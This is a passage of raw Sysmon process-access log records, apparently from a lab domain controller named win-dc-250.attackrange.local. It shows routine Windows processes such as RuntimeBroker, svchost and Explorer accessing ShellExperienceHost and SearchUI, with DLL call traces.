\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011129Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165480C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13624|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7bdd|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+7d23|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5fc83|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+924ab|C:\Windows\System32\combase.dll+938c2|C:\Windows\System32\combase.dll+51ca3|C:\Windows\System32\combase.dll+939dd|C:\Windows\System32\combase.dll+507df|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121 10341000x800000000000000011128Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165488C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011127Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165472C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011126Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11165444C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011125Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11164952C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011124Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11162832C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011123Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.545{08A6967A-4753-6000-0D05-000000009A01}11164772C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+8635|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+853f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17343|C:\Windows\System32\combase.dll+364fa|C:\Windows\System32\combase.dll+2d1ed|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\combase.dll+53b83|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7 10341000x800000000000000011122Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.529{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011121Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.529{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011120Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.514{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011119Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.514{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|c:\windows\system32\psmsrv.dll+e342|c:\windows\system32\psmsrv.dll+eb86|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011118Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.482{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011117Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.482{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011116Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.482{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011115Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.482{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011114Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.482{08A6967A-4288-6000-1100-000000009A01}11921988C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|c:\windows\system32\fntcache.dll+17aaf|c:\windows\system32\fntcache.dll+1a677|c:\windows\system32\fntcache.dll+1aaac|c:\windows\system32\fntcache.dll+502ee|c:\windows\system32\fntcache.dll+4fff2|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011113Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+18a6c|C:\Windows\SYSTEM32\psmserviceexthost.dll+e44e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e4e7|C:\Windows\SYSTEM32\psmserviceexthost.dll+e1f2|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e38|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011112Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+739b|C:\Windows\SYSTEM32\psmserviceexthost.dll+ae34|C:\Windows\SYSTEM32\psmserviceexthost.dll+7bae|C:\Windows\SYSTEM32\psmserviceexthost.dll+12111|C:\Windows\SYSTEM32\psmserviceexthost.dll+170a8|C:\Windows\SYSTEM32\resourcepolicyserver.dll+12326|C:\Windows\SYSTEM32\resourcepolicyserver.dll+bac5|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011111Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d966|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011110Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d8be|C:\Windows\SYSTEM32\twinapi.appcore.dll+2d331|C:\Windows\SYSTEM32\twinapi.appcore.dll+2ec2c|C:\Windows\SYSTEM32\twinapi.appcore.dll+2c467|C:\Windows\System32\TwinUI.dll+f40ac|C:\Windows\System32\TwinUI.dll+f4bf7|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011109Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8a65|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7fbc|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011108Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34085412C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\SHCORE.dll+316d6|C:\Windows\System32\SHCORE.dll+21cbf|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+523ce|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a 10341000x800000000000000011107Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:10.467{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2605-000000009A01}5188C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7f5b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\W